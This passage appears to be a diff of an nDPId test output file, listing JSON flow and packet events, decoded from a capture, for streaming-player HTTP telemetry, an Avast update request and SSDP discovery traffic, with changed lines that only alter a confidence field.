-00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1467353147794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353147794,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FnZAADMGI9HKbA7bwKhzCABQxTNxA7Ax9m8I11AYADa2JwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01211{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1467353147927,"pkt":"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"} 
-01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1467353148016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353148016,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kRtAADMGqSvKbA7bwKhzCABQxTRwkDYOpVBfVlAYADcrXAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353150114,"pkt":"TF4M6gNlABxCjnAxCABFAAOlCc1AAIAG4HzAqHMIymwO7MU1AFBQgbYWJ\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"} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1467353150272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353150272,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5A3BAADMGNsbKbA7swKhzCABQxTUn\/rQSUIG5k1AYACEwggAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAADZC01AAIAGRNfAqHMITeooYMU2AFCms6ewkbp6GVAYAQQ6hQAAUE9TVCAvYmMyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtZW5jDQpVc2VyLUFnZW50OiB7RDY5OTA1NEQtMTY5OS00N0QyLTlCMkItRTk2RjQzOEMxMTYwfQ0KQ29udGVudC1MZW5ndGg6IDU2NzANCkhvc3Q6IGJjdS5mZi5hdmFzdC5jb20NCg0K"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} 
02163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC05AAIAGQJvAqHMITeooYMU2AFCms6hhkbp6GVAQAQSchQAAfQmTpyjixsOwP21FM2w\/ULoWwCiRrGBztIvpkusTbkEbT7JRm749XrUdCj1kKEvBT\/wTVkKLufbjw1lE2fa\/UtfZqs8TT1sk5wEGF4kYfIBf8IaB+OB99fNQgj9Vf1WdVn6TWCfKWR8\/tOS1RKXEgVzfK9erxE3KK+nwydrin0EcycTdDVWiVtuMe6+NSVWZ\/hX990m9djhmhk3Y\/4CbzK44FcPuMMFEvf5FVV6Oh2IVmfsf\/HyiZyDsblCwMFxZeIENUdwKFZahHZX4t2m+0Z8nqx5GXJvlYlyBEV3d0wnwacDVs7VGlTeQSPCThjPgIK8C3+Vm\/SkQMbSbjQQCR56leCZ3zx0zWA16oy\/HwboJXydgKpLLIsIb296bgz9PD0n73r5JevLp9zMQqDnUQH7bGAIZpCoRWg6yOqztL9wx8O8w7fULoBoHntXDNfSIf8aFHnKtztY0xF\/96mqnymFN1wqAbHV11hLYYhYABZBRKOYh4GvMJKN2EaePTJX1g69akJ5Coj\/WAxsj0dEvDR\/vazeiKPax6X0XCpj5u6F0enF2pgEO1DTDpJi4uqvsm4AG7RZTr9WzwZ511fH70pdVZhvHAHeLJEQhK3oT2d6qVMypkVqz3M6P1FXtaWt6+1gJ1EA+POfXctGwSFaJ2WZGwODsWtngLfTDrHYAa++DuvVvAXrC2fFJrQkArXUNzp3jB4yvJRX9IfGTljC134RtjqrqbfWIsHFlGJEvMl6y8wFPjh0U9nAnPPQHSvBi4P8rwzQhP8lZJWbdcGMeiQgoqjzlwL1JkK4Z+B\/r9S3cXUR8rrHDij9ETvqsfuOaaaj2os8zFQDB8g7oYE5htEg8jLGOrgDB+UxAsTk63FA\/Jq1qLQHIt5T87bux2F3Z6\/NtrKJ6XYTsiyX+gxtG9H+42iLcG1kZ\/aUAi1jpTBvtNKfvz8CwqOqNqLU20IAIOBemooRjwRmnBDY3f6aUMeS+wFWlvE\/51CwA1+ifJ60PDvUC79ewXAaFTKMKjf0aaHbyL5CorfEgQAN7IeqBZ06UIaZ6vzz7AgQaAmx6+Ba5qOjoaqoz\/AZLRtOM5g9J99\/JqcSZWau6dqbzwSi9lHTkFpydYtcaUiasMFbnGv1qCDetlZciKtaHoyXbLcLDtNVUeS+HOrUzQyYK2h4whXgFAMDp8Qgu77GMRNBVQqzQrQHNXcQsTRb6ToCJRD0mhPHF56bxN+TcgS8+LJg2hXeTQJGeN4XVvZl+\/NwXCMoOTGaegW++r9Spf9MH6Q7pxuozLc8xjGZ4BotpQroHGQdbg1euShz6cj4v+w35bhHqsX2WqI17RldQkIoRivoqIWQBzpBtvyVToKzr4w1pfcU7KlWiZF6wXXPmeAndVoYy0RAdjUny0dy7q\/aodxD7\/IpKex\/VPNqhV606AtQnAV2BIj+BMksKx18fv+MTvBJVqBMbMlNv\/dfX4KuK9dxD\/j5nlJb1fFCWJ+mUJw+9FKSt1DG2gs0a3nU5wTbq1xdLskl
g3Akuz9T9GOR2bt29bGI8qPpXY4FyhIeC9WH4\/TgMEDv9wfb4n6lndgz9I\/9vnUXWZxcDVa2twnV4LY8xc0KQum7e2YlcthsPm+N4Sl\/nQbs4298fPcsHdqZxtg1t+yz4aZA3Jpe+9\/ltbgGRFyN2OyRh7w7lbrWs"} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1467353152282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353152282,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC5NAAIAGQFbAqHMITeooYMU2AFCms61Nkbp6GVAQAQTfHQAAbLkOCKU4wj\/evx8imwONGRNDCRNcxEbrXP8hhP5gS61xcdF\/9QCewJiAs88\/dsvrtuhb3rfKKfW889MM5i42wXGEV9fB6Oxnr9wNq+2BhBuurBIHxqXRfAAEoidfx5NjtSMkojiYfAgpgjXDepNqnYPmOEFYHjyOyZguAfDLSM7WCkcWflClhfDaN8J2wfLC\/MPix0DO7IQYMANuOzdnO3SsyyWTTBGHWAEilJLD4tHtNv5RXPXVzcDFv\/ZarQ8dpVXt06BE7M0zlIZna\/IAgdCvI6q5WBZEc\/DK1bc+szeRLHeTn9hb3LwIm5n4j6dH8WghVh4s\/faOqc4OH+pUVO\/YE9fpSsBUVYngldbrHRI5VyRGxL9aOSsPtS4AFeevGJhVzhN4cUWAnUrThdi80PfSu8tNoh7a5szE8bOfyFSl1J5U7dmSuzwsTd1O2VTTA6KkfW80J9853vrsBHj4FYhAgrfCc+AwKx842BJ5tAqCj0sllv5X87h05vAIn5jnPfuPTQZHDGSZF2ChAwxTMJDdvR6z9YqImCWEyGrlX5kVoRgmxMOXn9xgYST7BNbiKdlZJF63+s1OXqQANdKPZK9Tj+vw5aEt8npdIxi659XlE7GbPxGSGQAHioYprIcBMeXfKSeoFXi6v3GiDBYEY44c+YWn+u5dOrxPQy5gu98V\/bpgMgXufFfUvDeO83MuZBryxxpxRtKyO19btTWCUF4PY4vFOsUlEu5wupC5QJDHjSI5JBPnNgSjAFFlHl+H48KJmALxOWkXAjw7wfJ7i0t\/VAJjqzl7KEymLhTMovEkDd8M5KH4L7bM1Pk5SNL44CnPTt0uJC5bu5Y0nC5WeJ5o8FAU+zDySeyFlAKIjVubfBhsfH6iYELuT6bM366CZ2JChIMXy77eZ2ogebEDmfXuAZrshdW456rcGFtnXh7J5hHvVDP3AMs6IVf8LUWSqi6N9+RmH\/KbTYzdQuJb03F7\/k5dx4g2yWo3fs+Lr5JRUf5t\/vLHgHitgjVHiyfZxFryJ2gxO3j2J3Cy8+3iOyUtI4v3PFchrsaNap7PQFpuFhS4kHaW1nfHocLobHPOFLIJLaEq2Z3VJqsMiOWSIoeotU+nrZScO9ejGxvSfkni9AXlOWPv1zuo9rLJelhCyIJrC4Xn+WkzpkY6zFTV6\/5UunGX0Tb8Vczy7McXvGLjkrbiGj3QMStuCAUNlJpEVT8k65UrM5LwbEH4KAV5kUEs1eVMQu3tNilgdCCEWCCXyXIXhc7F8aNPdAP\/PS1DvzRFz2xUmcIICmQZ5HsVmrPOAorHnvum6saL0SZ4Xpsb2NtRcCkYo5ulH5R5LBdjwVak1WRQmaIpJTSu
FDlTHmcUlO91XLgWqht8m4JPcT8KVxMhaep7\/D8rK0OPB4\/bZz3AmwRRkEn1w2WxcrplYcrA9llu+UUdElcjgIQb+8Ut3dZ78QhR6hg0LSfopHZZKMjm7H8PGYnnckV7+UPzMYjSuw2xH6Scc5NP4qyN1pRNyJqbAsYjU9DQoRSV4QpLKW1o4cygA24ZnSsb0t8q6Ugh54j1Rk4AcTFxkKhm0GqVFfy3vqOZrj5LFm1yDiouv3X+Ev+I8njUSG1\/7yVhpxE8Ojwp45UwRLFQxvD31ZdmkgP4Weywok7EK11JBAomj+s4\/jGCJXIASa\/M"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1467353152692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353152692,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLGwAAAER1wTAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1467353155693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353155693,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLG0AAAER1wPAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353155790,"pkt":"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"} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
